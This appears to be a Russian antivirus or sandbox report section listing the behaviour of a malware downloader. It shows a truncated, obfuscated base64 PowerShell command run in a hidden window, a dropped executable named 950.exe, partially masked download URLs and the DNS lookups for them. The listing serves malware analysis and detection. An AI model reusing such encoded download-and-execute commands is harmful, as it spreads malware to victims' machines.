Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEsARwBGAEcAeQBsAHMAPQAnAEUAWQBUAEQAWQB1AHEAYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAGAAVQByAGkAVAB5AGAAUAByAGAATwB0AE8AYABDAE8AbAAiAC...
- %HOMEPATH%\950.exe
- %HOMEPATH%\950.exe
- http://la##rsa.com/preview/pXHuX/
- http://ro###lab.net/php/sBUVLCCA/
- http://www.ru###miller.com/statement/yOdnH/
- http://se####phonic.com/images/kXLCVUaq/
- http://st##iarz.pl/licznik/aRO0ndjc44/
- DNS ASK la##rsa.com
- DNS ASK ro###lab.net
- DNS ASK ru###miller.com
- DNS ASK se####phonic.com
- DNS ASK st##iarz.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABPAEsARwBGAEcAeQBsAHMAPQAnAEUAWQBUAEQAWQB1AHEAYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBDAGAAVQByAGkAVAB5AGAAUAByAGAATwB0AE8AYABDAE8AbAAiAC...' (со скрытым окном)